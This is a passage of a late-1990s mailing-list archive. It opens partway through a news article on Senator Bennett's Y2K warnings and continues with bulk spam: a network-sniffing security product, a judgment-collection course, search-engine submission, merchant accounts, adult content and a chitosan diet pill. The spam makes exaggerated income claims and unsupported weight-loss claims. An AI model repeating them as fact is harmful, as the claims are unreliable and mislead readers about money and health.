technology problem.
By David M. Bresnahan
(c) 1998, WorldNetDaily.com

SALT LAKE CITY, UT -- As preparations for
widespread global panic and disorder over the Y2K crisis
begin at the United Nations, the U.S. senator considered
the most knowledgeable about the millennium bug,
assures the United States does not have plans in place for
martial law.

Representatives from 130 nations met in a closed-door
meeting Friday to discuss the Y2K crisis and the
predicted problems that will occur around the world. The
use of SWAT teams and martial law are being planned,
according to a source present for the meeting at the U.N.

Many underdeveloped nations expressed concern
because they have had no ability to prepare for the Y2K
problems, and many other smaller nations are far behind
where they should be, the source told WorldNetDaily.

The discussions at the meeting turned to how to handle
public panic and unrest that is expected to result on
January 1, 2000, if the Y2K computer bug shuts down
power, communications, and transportation.

The meeting was only the first of many more to come.
Eventually, a formal request may be made to the U.N.
for coordinated military action, according to the source.
Representatives in the meetings openly expressed their
fears of unrest, and voiced a need for martial law, and
the use of military and police SWAT teams.

Meanwhile, Bennett, chairman of the Senate Special
Committee on the Year 2000 Technology Problem, has
been actively sounding the alarm about domestic
problems that may result because of the computer glitch.
But he says martial law is a minimal threat in the U.S.

"I'm not one of those who think that Bill Clinton will
automatically, or in some diabolical way, try to manipulate
this problem (Y2K) to impose improper force on
anybody," he stated. "I just don't see any indications of
that. Until I see some suggestion that that really is
happening I won't believe that it's under consideration."

Bennett did acknowledge that Canada is formulating
plans to initiate martial law because of Y2K.

"The Canadian armed forces are organized very
differently than American armed forces," explained
Bennett. "We don't have the provision to turn out the
military from the Pentagon in a presidential declaration of
martial law like the Canadians do."

Although Bennett has been personally speaking out about
the reality of the problems that could result from the Y2K
bug, he has begun to tone down his predictions. He
blames some of the fear being generated about the
problem on businesses selling survival and preparedness
supplies.

"There's no question but that some of the hysteria is being
whipped up by people who have products to sell," Bennett
told WorldNetDaily in an exclusive interview. "At the
same time, there are people who have legitimate products
to sell that could have an impact on the Y2K problem,
who have every right to talk about the problem in their
legitimate marketing efforts."

"Sometimes the lines between those two get blurred, but I
don't want to be party to helping sell any particular
product or service. That's not the appropriate thing for a
United States senator or a United States Senate
committee to do."

Bennett was critical of most government agencies and
private businesses for not working on the problem sooner.
He said the Social Security Administration is to be
commended for getting an early start, but most others
failed to work on the problem soon enough to solve it in
time.

The total cost to fix the Y2K bug is expected to exceed
$600 billion, with legal expenses in excess of $1 trillion,
according to Bennett. Those numbers do not include
estimates of lost business revenues, and corresponding
loss of tax revenues. Potential damages and repairs are
also not part of the estimates.

Of all government agencies, Bennett said his greatest
concerns are with the Defense Department. He said the
Pentagon began work on the problem too late.

Bennett listed the priorities of his committee as power,
telecommunications and transportation. He explained that
it will do little good for businesses to fix the Y2K problem
within their company if they don't have power,
communications, or transportation.

"If there is no electricity, it doesn't matter whether your
computer is Y2K compliant or not," said Bennett. "Your
laptop batteries won't last long enough to solve all your
problems."

When Bennett first began spreading the alarm about
Y2K, he stated that there was a 40 percent chance the
nation's power grid would not function because of Y2K.

"Now I think that 40 percent has shrunk down to single
digits -- 5 percent, 3 percent -- pick your number, it
doesn't really matter, it's a relatively small chance that the
power grid will fail," said Bennett confidently.

"I still think we will have brownouts," he added. "I don't
know how long they will last. I don't know where they
will hit, and I don't know how severe they will be. The
very nature of the problem indicates that we cannot get
through this with complete, absolute, 100 percent
assurance, although there are people in power companies
that are now telling me that's what we can depend on.

"My own sense of the thing says, no, there's got to be
some brownouts. There will be some interruptions, but
the power grid will not fail. Don't go out and dig up your
backyard and bury propane tanks, or go out and buy your
very own generator, because I think we will have
power."

"I think the telecommunications system will work,"
predicted Bennett. "There will be individual exchanges or
switching companies, or what have you, that will have
problems. We won't know until we can test the whole
system end to end. But there are enough heartening
indications that things are going to be alright that leads me
to believe that the telecommunications system will work."

The nation's power grid is also dependent on a
telecommunications system which enables all the various
computers to communicate and keep the grid functioning.
The telecommunications systems depend on the power
grid to provide the necessary electricity.

"If we have a breakdown in the transportation system, it
could eventually shut down the economy by itself," said
Bennett. "For example, if the trains don't work because
the switching systems don't work, you can't get coal from
coal mines on the trains to the power-generating plants,
which means eventually you don't get any power and the
power grid goes down and then the dominoes can fall in
various directions."

The most vulnerable transportation system which may be
interrupted is maritime shipping, according to Bennett.

"Getting oil out of foreign countries onto ships through
customs with all the paper work that is involved with all
large transoceanic shipments. And, of course, all of the
paper work is controlled by computers," explained
Bennett.

Ships are computer-operated and must dock in ports that
are also computer mechanized. Customs procedures are
also dependent on computers to deal with the enormous
amount of cargo coming into the country every day.

"A breakdown (could occur) in that kind of transportation
chain which depends not only on Y2K compliance in this
country, but in many countries including the countries that
license the ships, and the countries where the oil is
produced," Bennett said. "I think the chances of a
breakdown somewhere in that chain are probably higher
than the single digits, and that could create some
interesting and challenging economic difficulties."

Bennett also took time to give advice to those who wish
to determine how they may be impacted personally by the
Y2K problem. Many people are planning to take their
money out of banks prior to the start of the year 2000.
Bennett is not personally concerned about access to his
bank account.

"You have every right to contact your institution, whether
it's a bank or a credit union, and ask, 'Are you going to be
Y2K compliant?' If you don't have the answer that you
deserve, then take your money out," said Bennett.

He said there will be individual banking institutions where
checks will not clear and ATMs will fail. Some banks and
ATMs will work, and others may not.

"You have the responsibility to take care of your Year
2000 problem, just as your bank has the responsibility to
take care of theirs, or just as Bill Clinton has the
responsibility to take care of America's," he explained.

Despite his own sometimes-dire warnings, Bennett says
no one should have fear.

"I think fear is too strong a word, but I think all of us
should have some concern," he explained. "Concern
enough to inform ourselves. You need to find out as
much as you possibly can about what's really going to
happen to you, and then make intelligent contingency
plans."

He advises talking to city, county, and state officials to
determine if local government is prepared to continue to
provide services in the year 2000. Bennett also advises
that everyone should contact businesses they depend on
for goods and services, and evaluate to what extent they
will be impacted by Y2K.

The task is complicated by the need to evaluate the entire
chain of supplies. It is not enough ask your local grocery
store if it is Y2K compliant. It must also be determined if
the chain of supplies to the grocery store will be able to
continue to deliver goods.

"The contingency plan may be very minor, it may be
non-existent," said Bennett. "You may say, 'In my job,
with my employer, in my city, everything is going to be
fine, I don't need to worry about anything.'

"Or you may say, 'Where I live there is a 20 percent, 30
percent chance that the trucks might not be able to get to
the supermarket where I buy food. I probably ought to
have a little extra food. In my city the water purification
plant is proving to be far more troublesome than it would
be someplace else, and in my city I better have a supply
of fresh water that can take me through while they're
trying to get this taken care of.'

"That's not fear," explained Bennett, "that's intelligent
planning based on sound information. Everyone of us has
to take the responsibility for gathering his or her own
information and then making personal decisions.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "info" <info@aggressor.net>
Date: Mon, 28 Dec 1998 18:04:23 -0800 (PST)
To: <info@aggressor.net>
Subject: Release Information
Message-ID: <001101be32de$208c0b90$3c59aec3@aggressor.net>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 2678
Lines: 86


 Dear subscriber,

  We are glad to inform you that "The Aggressor PRO V1.0" and "The Aggressor
NTT v1.0" is now released.
  You may download Trial version of The Aggressor PRO from
http://www.aggressor.net.


  * Brief list of features :

  - Advanced Network Sniffing Module

    The Aggressor PRO entitles you to monitor the network traffic on your
local network.
    This feature enables you to read every incoming and outgoing email,
monitor web access of
    employees or monitor irc or icq messages, it has filtering mechanism to
ease viewing connections and
    connection logging feature for autosaving the connections and view them
later.

  - Intrusion Detection

    The Aggressor's beholder module controls all connections/packets between
your local network and internet,
    analyses incoming and outgoing packets, detects and logs hostile actions
like portscanning, denial of service
    attacks or exploit attacks, logs them and alerts the administrator when
such an attempt occurs.

  - Blocking

    With The Aggressor, you can block service usage and server access by
making rulesets.
    Network monitoring options allow the system administrator to ban sites,
services, block connections,
    ban keywords and more.

  - Network Vulnerability Scanner / Informator

    This module enables you to test your network against hacker attacks.
With its live plugin support, you will
    be able to test your network against latest security vulnerabilities by
downloading related plugin file from
    our website. We also have Plugin SDK (for Delphi and Visual C) for you
to develop your own plugin files for
    The Aggressor.

  - Network Administration Tools.

    The Aggressor has most important internet tools which are useful for
network administration such as DNS Scanner,
    Portscanner, Finger, Ident, Whois, Ping, Traceroute. With The Aggressor,
you will not need use any internetworking
    tools from any other sources.

    Requirements :

    Windows NT 4.0 ( Installed Internet Explorer 4 for HTML Filter )
    Ethernet Connection (or another 802.3 frame compatible device)

    Pentium 200 MMX (Pentium II 266 Recommended)
    32 Mb Ram (Additional ram for high network traffic (64+) )
    10 Mb Disk space  (Additional disk space for connection / observer
logging)

    You can obtain detailed information about our product from
http://www.aggressor.net

    Please note that this is a release notification email you can send email
to list-request@aggressor.net with
    subject "UNSUBSCRIBE" to remove yourself from our notify list .


    Regards
    Korhan KAYA

    AGIS Corporation
    http://www.aggressor.net
    (+90)(212) 212-3427






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: noy99@earthlink.net
Date: Tue, 29 Dec 1998 11:52:03 -0800 (PST)
To: noy99@earthlink.net
Subject: Re: Our answer to your request
Message-ID: <1998122995ZAA48295@earthlink.net.regismckenna.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 9432
Lines: 117


Thank you for your interest in our training Course.                             

Success Courses  offers an extensive Video Tape training course in "How to Collect Judicial Judgments".


If you are like many people, you are not even sure what a Judicial Judgment is and why processing Judicial Judgments can earn you very substantial income. 


If you ever sue a company or a person and you win then you will have a Judicial Judgment against them.  You are happy you won but you will soon find out the shocking fact:  "Its now up to you to collect on the Judgment".  The court does not require the loser to pay you.  The court will not even help you.  You must trace the loser down,  find their assets,  their employment, bank accounts,  real estate,  stocks and bonds,  etc.   Very few people know how to find these assets or what to do when they are found.  The result is that millions of Judgments are just sitting in files and being forgotten.

"In 79% of the cases the winner of a Judgment never sees a dime."

The non-payment of  judicial debt has grown to epidemic proportions.  Right now in the United States there is between  200 and 300 billion dollars of uncollected Judicial Judgment debt.  For every Judgment that is paid,  5 more Judgments take its place.

We identified this massive market 4 years ago and have actively pursued Judicial Judgments since.  We invented this business. We have perfected it into a well proven and solid profession in which only a select few will be trained in the techniques necessary to succeed in this profession.

With our first hand experience we have built a course which teaches you how to start your business in this new unknown and exciting field of  processing Judicial Judgments.

By following the steps laid out in our course and with reasonable effort you can  become very successful in the processing of Judicial Judgments.

The income potential is substantial in this profession.  We have associates who have taken our course and are now working full time making $96,000.00 to  over $200,000.00 per year.  Part time associates are earning between $24,000.00 and $100,000.00 per year.   Some choose to operate out of their home and work by themselves.  Others build a sizable organization of 15 to 25 people in attractive business offices.


Today Success Courses  and our associates have over 632 million dollars in Judicial Judgments that we are currently processing.  Of this 632 million,  36 million is in the form of joint ventures between our firm  and our associates.  Joint ventures are where we make our  money.  We only break even when our course is purchased.  We make a 12% margin on the reports we supply to our associates.   Our reporting capability is so extensive that government agencies,  police officers,  attorneys,  credit agencies etc.  all come to us for reports.


Many of our associates already have real estate liens in force of between 5 million to over 15 million dollars.  Legally this means that when the properties are sold or refinanced our associate must be paid off.  The norm is 10% interest compounded annually on unpaid Judicial Judgments.  Annual interest on 5 million at 10%  translates to $500,000.00 annually in interest income,  not counting the payment of the principle.  Our associates earn half of this amount or $250,000.00 per year.  This is just for interest,  not counting principle and not counting the compounding of the interest which can add substantial additional income.  Typically companies are sold for 10 times earnings.  Just based on simple interest an associate with 5 million in real estate liens could sell their business for approximately 2.5 million dollars.


92% of all of our associates work out of their home;  43% are women and 36% are part time.   


One of the benefits of working in this field is that you are not under any kind of  time frame.  If you decide to take off for a month on vacation then go.  The Judgments you are working on will be there when you return.   The Judgments are still in force,  they do not disappear.



The way we train you is non-confrontational. You use your computer and telephone to do most of the processing. You never confront the debtor.  The debtor doesn't know who you are.  You are not a collection agency.


Simply stated the steps to successful Judicial Processing are as follows: 


 Mail our recommended letter to companies and individuals with Judicial Judgments.  (We train you how to find out who to write to)


 8% to 11% of the firms and people you write will call you and ask for your help.  They call you,  you don't call them unless you want to.


 You send them an agreement (supplied in the course) to sign which splits every dollar you collect 50% to you and 50% to them.  This applies no matter if the judgment is for $2,000.00 or $2,000,000.00. 


 You then go on-line to our computers to find the debtor and their assets.  We offer over 120 powerful reports to assist you.  They range from credit reports from all three credit bureaus,  to bank account locates,  employment locates,  skip traces and locating stocks and bonds,  etc.  The prices of our reports are very low.  Typically 1/2 to 1/3 of what other firms charge.   For example we charge $6.00 for an individuals credit report when some other companies charge $25.00.


 Once you find the debtor and their assets you file garnishments and liens on the assets you have located.  (Standard fill in the blanks  forms are included in the course)


 When you receive the assets you keep 50% and  send 50% to the original Judgment holder.


 Once the Judgment is fully paid you mail a Satisfaction of Judgment to the court. (Included in the course)

Quote's  from several of our students:


Thomas in area code 516 writes us:  "I just wanted to drop you a short note thanking you for your excellent course.  My first week,  part time,  will net me 3,700.00 dollars.  Your professionalism in both the manual and the video opened doors for me in the future.  There's no stopping me now.  As of February 3rd, 1995, Thomas states he has over $8,500,000 worth of judgments he is working on.


After only having this course for four months,  Larry S. in area code 314  stated to us:  "I am now making $2,000.00 per week and expect this to grow to twice this amount within the next year.  I am having a ball.  I have over $250,000 in judgments I am collecting on now."


After having our course for 7 months Larry S. in 314 stated "I am now making $12,000.00 per month and have approximately $500,000.00  in judgments I am   collecting on.  Looks like I will have to hire someone to help out"


Marshal in area code 407 states to us  "I feel bad,   you only charged me $189.00 for this course and it is a gold mine. I  have added 3 full time people to help  me after only having your course for 5 months"


>From the above information and actual results you can see why we can state the following:


With our course you can  own your own successful business.  A business which earns you substantial income now and one which could be sold in 3-5 years,  paying you enough to retire on and travel the world.  A business which is extremely interesting to be in.  A Business in which every day is new and exciting.  None of your days will be hum drum.  Your brain is challenged.   A business which protects you from Corporate downsizing.  A business which you can start part time from your home and later,  if you so desire,  you can work in full time.  A business which is your ticket to freedom from others telling you what to do.  A business which lets you control your own destiny.  Our training has made this happen for many others already.   Make it happen for you!

If the above sounds interesting to you then its time for you to talk to a real live human being,  no cost or obligation on your part.


Please call us at  1-500-488-2035.  We have Customer Support staff available to you from 7:00AM to 7:00PM (Pacific Time) Monday through Saturday.  Closed Sunday.  If you call this number you can talk to one of our experienced Customer Support personnel. They can answer any questions you may have - with no obligation. Sometimes we run special pricing on our courses and combinations of courses. When you call our  Customer Support line they can let you know of any specials we may be running. If you like what you read and hear about our courses, then the Customer Support person can work with you to place your order. We are very low key. We merely give you the facts and you can then decide if you want to work with us or not.

Thank you for your time and interest.







++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 











++++++++++++++++++++++++++++++++++++++++++++++++++++++
Another Internet Ad campaign produced and distributed by:  Cyber Advertising Systems,  NY, NY 10011.  Please call Cyber Advertising Systems at 1-800-409-8302 Extension 1284 if you would like us to design and distribute powerful advertising for your company.  Success Courses is pleased with the advertising we have developed for them.  If you have a solid well proven product or service then we would be proud to help your company also.  If you would like to be removed from Cyber Advertising Systems mailing list then please send an email to:  hopkinsdf556@yahoo.com  and type remove in the subject line.
++++++++++++++++++++++++++++++++++++++++++++++++++++++
e;i




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ilin748@yahoo.com
Date: Tue, 5 Jan 1999 06:56:52 -0800 (PST)
Subject: your site
Message-ID: <199901051456.GAA22410@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1789
Lines: 72



            We'll Submit Your Site To 

                    Over 900

     Search Engines, Directories, & Indices

         For A "One Time Cost" Of Only

                    $ 39.95


     ***  100% Money Back Guarantee  ***

*** Immediately Increase Your Sites Exposure ***

 For Less Than 4 Cents Each We Will Submit Your
 Web Site To Over 900 Of The Net's Hottest Search 
 Engines, Directories & Indices.

 If your site isn't listed in the Search Engines,
 how can people find you to buy your products 
 or services?
 
 For just $39.95 we'll take the work load off your
 back instead of you trying to do it manually which
 can take days to do.

 We're the professionals that are here to help
 you have a shot at having a successful marketing
 experience with the internet.

 You know as well as we that your time is
 best utilized managing your business and not
 sitting at some keyboard hours upon hours
 trying to save less than 4 cents for each  
 submission. See how it's kind of crazy to try
 to tackle this on your own.  It's just not 
 cost effective to try to do this yourself to
 save just $39.95.

 See why thousands and thousands of businesses 
 world wide both large and small have come to 
 us to utilize our services.  Hotels, Motels,
 On-Line Stores, Travel Agents, Colleges, 
 Universities, Governments, Fortune 500 companies,
 Movie Studios, Chambers Of Commerce and many,
 many more.  Shouldn't you give us a call now?

 To Learn More, Call Us At The Numbers Below.
 
 Call us toll free at (800) 771-2003 in the USA
 and Canada or outside the USA at (916) 771-4739
 and we'll provide you with all the necessary
 information to get you submitted Right Away.






To be removed from our mailing list, please
respond with the word remove in the subject.
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dvf@btm.de
Date: Wed, 30 Dec 1998 03:09:14 -0800 (PST)
To: user@the_internet.com
Subject: Online Sales SkyRocket With Real-Time Credit Card Processing
Message-ID: <199812301105.MAA22147@ns.btm.de>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 3913
Lines: 103


INCREASE SALES UP TO 1500% ACCEPT CREDIT CARDS OVER THE INTERNET 

***NO SETUP FEES*** 


Good Credit / Bad Credit/ No Credit ***NO PROBLEM*** 


It Just Doesn't Matter - Everyone Gets Approved 

No Upfront Fees For Application-Processing 

While Others Charge You From $195 TO $250 To Get Set Up 

WE CHARGE ZERO FOR SETUP FEES!! 

Limited Offer So Take Advantage Of It!! 

We Specialize In Servicing The Following: 


*Multilevel Marketing 

*Mail Order/ Phone Sales 

*Home Based Business 

*INTERNET BASED BUSINESS 

*New Business* Small Business 


Whatever!! We Do It All!!! 

Everyone Is Welcome! 


* Scroll to bottom of this e-mail for CONTACT INFORMATION. 


>>>>> INTERNET SERVICE <<<<< 


It's finally here!!! 


A fast and reliable way to process credit cards through your web site The  Internet's reach is global - it knows no time zones or physical boundaries. With  our user friendly, easy to use program, you will convert your web site from an  electronic brochure to a virtual storefront without the addition of a sales  clerk!!! 


SECURE REAL-TIME ON-LINE TRANSACTIONS make it as easy as possible for your  customers to purchase your products or services. We use SSL SECURITY(best on the  NET today). 


You will summon your customers' impulse buying when you can safely process  credit cards through a secured web site linked directly to your web page. 


The Internet is the fastest growing industry in today's direct marketing  business. DON'T BE LEFT BEHIND!!! Give your customers the convenience of  ordering products right from your web page 


Now tell me if this doesn't sound intriguing, lets say a customer visits your  web site and decides they want to buy your product(s) or service(s). They would  simply enter their credit card information and receive an approval WITHIN 5  SECONDS. That's all there is to it!! 


>From that point on, the sale is complete and the money will be directly  deposited into your business checking account within 24 to 48 hours. So you will  have LIQUID ASSETS AVAILABLE ALMOST IMMEDIATELY!!! Your customer will be  e-mailed a receipt and you will be e-mailed an invoice slip, all  instantaneously. Now, since this program is automated for 24 hours a day 7 days  a week, you will be receiving orders and making money in your sleep!!! IT'S JUST  THAT EASY!!! 


We Also offer SOFTWARE AND TERMINAL PACKAGES. With our SOFTWARE PROGRAM, you  can now take PHONE and MAIL ORDERS, accept credit cards and expose your business  to thousands of new customers. All of this done through your own personal  computer!!! 


To accommodate your STOREFRONT RETAIL BUSINESS, we offer an ELECTRONIC  TERMINAL and PRINTER PACKAGE. A terminal will allow you to receive the LOWEST  DISCOUNT RATE per transaction available. 


>>>>>CONTACT INFORMATION<<<<< 


Through CSI, you can apply for a merchant account with NO APPLICATION FEE, NO  SETUP FEE, and BETTER RATES!!!! We believe the ability to accept credit card  payments greatly enhances your business, adds additional credibility in the  marketplace, and increases your potential for immediate sales. So, if your  serious about increasing your business potential, get your own Merchant Account  today!!! 


 

CALL 1(800) 600-0343 ext. 1625 


 

************************************************************ 


The Mailing List that you are being mailed from was filtered against the  Global Remove List at: FFcvfgt@gmx.de  


Remove-List is a free public service offering to help the general public get  removed from bulk mailings lists and has not sent this message. If you want  their help please add your name to their list and we you will not receive a bulk  email from us or any other ethical bulk emailer. 

------------------------------------------------------------------------------------------------------ 


 

 

************************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: otfipl@udme.eoqni.nirl.com
Date: Tue, 29 Dec 1998 11:09:14 -0800 (PST)
Subject: Is what you are looking for ?
Message-ID: <199812300314.GNM5249@kmop.pgkgy.gywe.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 319
Lines: 14



Please note that this is a one time mailing 
and you will not receive any further invitations to us.

If you are over the age of 18 and are looking for the
hottest adult entertainment on the Internet Today,
Click here to see something that you've NEVER SEEN BEFORE!

http://members.xoom.com/MK44DHTA/default.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hu8473@yahoo.com
Date: Wed, 6 Jan 1999 00:22:50 -0800 (PST)
Subject: your web site
Message-ID: <199901060819.AAA00376@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1805
Lines: 80



            We'll Submit Your Site To 

                    Over 900

     Search Engines, Directories, & Indices

         For A "One Time Cost" Of Only

                    $ 39.95


     ***  100% Money Back Guarantee  ***

*** Immediately Increase Your Sites Exposure ***

 For Less Than 4 Cents Each We Will Submit Your
 Web Site To Over 900 Of The Net's Hottest Search 
 Engines, Directories & Indices.

 If your site isn't listed in the Search Engines,
 how can people find you to buy your products 
 or services?
 
 For just $39.95 we'll take the work load off your
 back instead of you trying to do it manually which
 can take days to do.

 We're the professionals that are here to help
 you have a shot at having a successful marketing
 experience with the internet.

 You know as well as we that your time is
 best utilized managing your business and not
 sitting at some keyboard hours upon hours
 trying to save less than 4 cents for each  
 submission. See how it's kind of crazy to try
 to tackle this on your own.  It's just not 
 cost effective to try to do this yourself to
 save just $39.95.

 See why thousands and thousands of businesses 
 world wide both large and small have come to 
 us to utilize our services.  Hotels, Motels,
 On-Line Stores, Travel Agents, Colleges, 
 Universities, Governments, Fortune 500 companies,
 Movie Studios, Chambers Of Commerce and many,
 many more.  Shouldn't you give us a call now?

 To Learn More, Call Us At The Numbers Below.
 
 Call us toll free at (800) 771-2003 in the USA
 and Canada or outside the USA at (916) 771-4739
 and we'll provide you with all the necessary
 information to get you submitted Right Away.






To be removed from our mailing list, please
respond with the word remove in the subject.
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qiy68@leica.com.au (wghtlost)
Date: Thu, 31 Dec 1998 04:48:47 -0800 (PST)
To: qiy68@leica.com.au
Subject: 'Tis the day after Christmas And something's not right
Message-ID: <19981231190EAA12275@vertuoks.snioe.on.ca>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1308
Lines: 39



'Tis the day after Christmas  
And something's not right
Were painfully aware
That our clothes are too tight.

We ate lots of gravy
And pumpkin pie too
Oh, no, not a diet...
But what shall we do?

Now you can lose weight without suffering.   Call Tides of Life at
1-888-817-7443 for information on safe, natural, and effective weight
loss products.

Our premier product, Cheat & Eat, contains 1000 mg of chitosan per
tablet along with herbs.  This binds to fats and sugars in the
intestinal tract, blocking absorption and passing them out of the body
before you can absorb the calories!  Also stops sugar cravings. 
Clinical studies show an average weight loss of 4 pounds per week with
no drugs, side effects or starvation diets!  We are offering a great
introductory price of $29.50 plus $2.50 shipping for a 6 week supply. 
You can buy much weaker chitosan products for $70/bottle but we have
located the best product for you at the best price.

Call 1-888-817-7443 for more information on Cheat & Eat and other
natural weight loss products.  Tides of Life has specialized in natural
hormonal products and related health supplements since 1993.  Free price
list upon request.

*-*-*-*-*-*-*-*
Removal from lists, please go to http://209.216.69.189/remove/

#2167659jdfv94894hde
nqr is <qiy68@leica




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ji4481@yahoo.com
Date: Wed, 6 Jan 1999 23:22:42 -0800 (PST)
Subject: about your site
Message-ID: <199901070722.XAA09915@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1789
Lines: 72



            We'll Submit Your Site To 

                    Over 900

     Search Engines, Directories, & Indices

         For A "One Time Cost" Of Only

                    $ 39.95


     ***  100% Money Back Guarantee  ***

*** Immediately Increase Your Sites Exposure ***

 For Less Than 4 Cents Each We Will Submit Your
 Web Site To Over 900 Of The Net's Hottest Search 
 Engines, Directories & Indices.

 If your site isn't listed in the Search Engines,
 how can people find you to buy your products 
 or services?
 
 For just $39.95 we'll take the work load off your
 back instead of you trying to do it manually which
 can take days to do.

 We're the professionals that are here to help
 you have a shot at having a successful marketing
 experience with the internet.

 You know as well as we that your time is
 best utilized managing your business and not
 sitting at some keyboard hours upon hours
 trying to save less than 4 cents for each  
 submission. See how it's kind of crazy to try
 to tackle this on your own.  It's just not 
 cost effective to try to do this yourself to
 save just $39.95.

 See why thousands and thousands of businesses 
 world wide both large and small have come to 
 us to utilize our services.  Hotels, Motels,
 On-Line Stores, Travel Agents, Colleges, 
 Universities, Governments, Fortune 500 companies,
 Movie Studios, Chambers Of Commerce and many,
 many more.  Shouldn't you give us a call now?

 To Learn More, Call Us At The Numbers Below.
 
 Call us toll free at (800) 771-2003 in the USA
 and Canada or outside the USA at (916) 771-4739
 and we'll provide you with all the necessary
 information to get you submitted Right Away.






To be removed from our mailing list, please
respond with the word remove in the subject.
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hu8473@yahoo.com
Date: Sun, 3 Jan 1999 23:41:22 -0800 (PST)
Subject: your web site
Message-ID: <199901040741.XAA07266@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



            We'll Submit Your Site To 

                    Over 900

     Search Engines, Directories, & Indices

         For A "One Time Cost" Of Only

                    $ 39.95


     ***  100% Money Back Guarantee  ***

*** Immediately Increase Your Sites Exposure ***

 For Less Than 4 Cents Each We Will Submit Your
 Web Site To Over 900 Of The Net's Hottest Search 
 Engines, Directories & Indices.

 If your site isn't listed in the Search Engines,
 how can people find you to buy your products 
 or services?
 
 For just $39.95 we'll take the work load off your
 back instead of you trying to do it manually which
 can take days to do.

 We're the professionals that are here to help
 you have a shot at having a successful marketing
 experience with the internet.

 You know as well as we that your time is
 best utilized managing your business and not
 sitting at some keyboard hours upon hours
 trying to save less than 4 cents for each  
 submission. See how it's kind of crazy to try
 to tackle this on your own.  It's just not 
 cost effective to try to do this yourself to
 save just $39.95.

 See why thousands and thousands of businesses 
 world wide both large and small have come to 
 us to utilize our services.  Hotels, Motels,
 On-Line Stores, Travel Agents, Colleges, 
 Universities, Governments, Fortune 500 companies,
 Movie Studios, Chambers Of Commerce and many,
 many more.  Shouldn't you give us a call now?

 To Learn More, Call Us At The Numbers Below.
 
 Call us toll free at (800) 771-2003 in the USA
 and Canada or outside the USA at (916) 771-4739
 and we'll provide you with all the necessary
 information to get you submitted Right Away.






To be removed from our mailing list, please
respond with the word remove in the subject.
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lay8@helium.dcs.kcl.ac.uk (gr8adz)
Date: Thu, 31 Dec 1998 06:26:00 -0800 (PST)
To: lay8@helium.dcs.kcl.ac.uk
Subject: Your ad to 1 Million...$50
Message-ID: <19981231666YAA31316@quomsrek.turxo.ee.surrey.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 2990
Lines: 91



  EMAIL YOUR MESSAGE TO ONE MILLION ADDRESSES 
        FOR LOW INTRODUCTORY PRICE OF US$50.00 ! 

This is a Co-Op mailing service! I'll email your 5-line message to 1
million potential buyers for the low Special of US$50. Promote your
products and services at a low cost! Very limited Space. Order your
slot today! First come, first served! 

   1000+ SEARCH ENGINE SUBMISSION FOR ONLY US$15.00 

I'll submit your web site info to 1000+ search engines, directories,
free links for  all for only US$15.00. Best price on the internet! 

   SUBMIT AN AD TO 150 TOP  CLASSIFIEDS:  US$15.00 

I'll submit your ad to top 150 internet and global sites for only
US$15.00. An expensive way to promote your products/services! 

     SUBMIT AN ELECTRONIC TRADE OPPORTUNITY: $15.00 

I'll promote your product or service worldwide through the Electronic
Trade Opportunities System that goes to millions of traders all over
the globe! 

  SEARCH FOR BUYERS & IMPORTERS WORLDWIDE: $15.00 

Locate buyers and importers in 100 countries! I'll submit your request
to 100 chambers of commerce in 100 countries. Ask them to advertise
your request for local buyers, agents, importers, etc. in their
country! 

    REACH 20,000 U.S. IMPORTERS & EXPORTERS BY FAX! 

Ideal for non-US companies trying to enter the US market and find
agents, buyers, dealers, etc.! Imagine the cost if you were to send
your own fax to 20,000, let alone the DAYS you will spend doing that!
With 7 other non- competing offers, we shall fax your 5 line message
for only US$395.00! 

---------------------------------------------------------------------
                                ORDER FORM: 

__Co-Op 1 million emailing of my message for US$50      $_____
__1000+ search engine & directory,  submission  $15        $_____
__150 Classifieds ads submission service for only $15      $_____
__Submit electronic trade opportunity worldwide  $15     $_____
__Submit search request to 100 chamber of comm.$15.     $_____
__Co-op fax service to 20,000 US firms for only $395     $_____

         TOTAL FOR THE ORDER:.......................US $_________

I enclose payment by

 __Cash __Check __Money Order __Visa __M/Card.

Charge my credit card with the amount of US$______

Card#____________________
Expiry:______
Signature:_________________

Name:_________________________________
Address_______________________________
______________________________________
City:____________________State:_________
Zip:_____________Country:______________

E-Mail(Required. Please write/type clearly):
______________________________________


Mail/fax above to: 
Al Jebaly, 3668  161st  Terrace N., Loxahatchee, Fl. 33470. 
Fax (561) 792-6175. 

Once I receive your order, by mail or fax, I shall email you the
proper Form to fill the needed information for the service ordered!
Once you return this Form, I shall perform the service without delay!


+-+-+-+-+-+-+-+-+

List Removals go to http://www.globalremove.com

thank you very much
w




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fbi.files@usa.net
Date: Thu, 24 Dec 1998 18:33:47 -0800 (PST)
To: unique_info@your.files
Subject: Get Your FBI Files!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 9635
Lines: 158


Are you now or have you ever been in the FBI files?

The answer is, most likely, Yes!  Just about everyone has their own FBI file.

How do we know?  The authors did research under the Freedom of Information Act.  It shows that government agencies do not like being held accountable to the public and resist the efforts of citizens who seek information about their activities.

